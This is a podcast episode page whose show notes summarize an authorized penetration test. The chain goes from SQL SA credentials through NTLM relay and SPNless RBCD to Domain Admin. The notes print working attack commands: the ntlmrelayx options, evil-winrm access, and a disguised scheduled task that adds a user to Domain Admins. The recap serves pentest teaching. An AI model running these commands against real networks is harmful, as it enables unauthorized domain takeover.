))
7MS #691: Tales of Pentest Pwnage – Part 75
Manage episode 504661249 series 3603998
Content provided by Brian Johnson. All podcast content including episodes, graphics, and podcast descriptions are uploaded and provided directly by Brian Johnson or their podcast platform partner. If you believe someone is using your copyrighted work without your permission, you can follow the process outlined here https://podcastplayer.com/legal.
Holy schnikes, today might be my favorite tale of pentest pwnage ever. Do I say that almost every episode? yes. Do I mean it? Yes. Here are all the commands/links to supplement today’s episode:
- Got an SA account to a SQL server through Snaffler-ing
- With that SA account, I learned how to coerce Web auth from within a SQL shell – read more about that here
- I relayed that Web auth with ntlmrelayx -smb2support -t ldap://dc --delegate-access --escalate-user lowpriv
- I didn’t have a machine account under my control, so I did SPNless RBCD on my lowpriv account – read more about that here
- Using that technique, I requested a host service ticket for the SQL box, then used evil-winrm to remote in using the ticket
- From there I checked out who had interactive logons: Get-Process -IncludeUserName explorer | Select-Object UserName
- Then I queued up a fake task to elevate me to DA: schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
- …and ran it: schtasks /run /tn "TotallyFineTask"
691 episodes
Share
